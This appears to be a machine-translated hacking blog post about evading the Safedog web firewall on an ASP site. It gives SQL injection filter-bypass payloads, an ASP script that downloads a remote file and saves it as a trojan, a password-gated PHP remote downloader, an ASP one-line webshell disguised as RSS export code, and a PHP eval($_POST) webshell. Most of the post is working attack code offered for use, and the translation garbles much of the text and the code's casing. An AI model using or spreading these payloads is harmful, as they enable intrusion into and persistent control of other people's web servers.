Simple bypass of safe dog injection and some breakthrough ideas

My senior brother recently told me how hard our major is, so I ran to search for a ticket to see what the Cisco ticket was about, so we started this little injection.
 
After a simple conversation with customer service, I found that the cost was high, so I tried to check their official website. I opened a connection and found that it was a dynamic xxx. asp? Id =
 
As I wrote it into the DOC, the following describes the ideas ..
 
 
Which of the following methods does dongle have? Id = 69 and 1 = 1 and xx. asp? Id = 69 and 1 = 2 these are filtered, but for xx. asp? 0day5.com = % 00. & xw_id = 69% 20 and 1 = 1 and xx. asp? 0day5.com = % 00. & xw_id = 69% 20 and 1 = 2 is normal, it is OK to directly drop the tool
 
Let's just scatter some of our ideas. Don't try it...
For safedog, you can choose to download, not to upload files, this and the notes have been greatly tested
Asp download script, required to support data stream creation not deleted <%
 
Set xPost = CreateObject ("Microsoft. XMLHTTP ")
 
XPost. Open "GET", "http://www.bkjia.com/2.txt", False
 
XPost. Send ()
 
Set sGet = CreateObject ("ADODB. Stream ")
 
SGet. Mode = 3
 
SGet. Type = 1
 
SGet. Open ()
 
SGet. Write (xPost. responseBody)
 
SGet. SaveToFile Server. MapPath ("11.asp"), 2
 
Set sGet = nothing
 
Set sPOST = nothing
 
%>
Download the http://www.bkjia.com/2.txt file to the current directory and save it as 11.asp
Save it as x. asp, and then access it. Wait until the progress bar is complete and access 11. asp will find the trojan lying there.
Php. This is a big note <form method = "post">
 
<Input name = "url" size = "50"/>
 
<Input name = "submit" type = "submit"/>
 
</Form>
 
<? Php
 
$ Pwd = 'E'; // here is your password
 
If ($ _ REQUEST ['pwd']! = $ Pwd)
 
Exit ('Sorry, you are not validate user! ');
 
// Maximum execution time in seconds
 
Set_time_limit (24*60*60 );
 
If (! Isset ($ _ POST ['submit ']) die ();
 
// Folder to save downloaded files to. must end with slash
 
$ Destination_folder = './';
 
$ Url = $ _ POST ['url'];
 
$ Newfname = $ destination_folder. basename ($ url );
 
$ File = fopen ($ url, "rb ");
 
If ($ file ){
 
$ Newf = fopen ($ newfname, "wb ");
 
If ($ newf)
 
While (! Feof ($ file ))
 
{
 
Fwrite ($ newf, fread ($ file, 1024*8), 1024*8 );
 
}
 
}
 
If ($ file)
 
{
 
Fclose ($ file );
 
}
 
If ($ newf ){
 
Fclose ($ newf );
 
Echo 'OK, File has been downloaded! ';
 
}
Www.2cto.com
?>
Save as xx. php, and then use e. php? Pwd = e access will prompt you to enter the address, here find a website that does not parse php, and then upload it to... It will download the file and save it in the current directory
I have been using the sentence I mentioned by the legend of xianjian. <%
 
Call System_Initalize ()
 
Function System_Initalize ()
 
On Error Resume Next
 
Dim Rss2Export: Rss2Export = "Export"
 
Dim objArticle: objArticle = Request (Rss2Export)
 
Set Rss2Export = New TRssExport
 
With Rss2Export
 
Dim objRS, UserName, UserIntro
 
. TimeZone = ZC_TIME_ZONE
 
UserName = Users (UserID). Name
 
If objArticle <> "Then
 
. AddChannelAttribute "language", ZC_BLOG_LANGUAGE
 
Execute Replace (objArticle, "*" & Rss2Export ,"")
 
. AddChannelAttribute "copyright", TransferHTML (ZC_BLOG_COPYRIGHT, "[nohtml] [html-format]")
 
. AddChannelAttribute "pubDate", Now
 
Response. End ()
 
End if
 
End
 
End Function
 
%>
The password is Dim Rss2Export: Rss2Export = "Export ".
In php, nono is selected <? Php
 
Eval
 
($ _ POST
 
[1])
 
?>
The password is 1.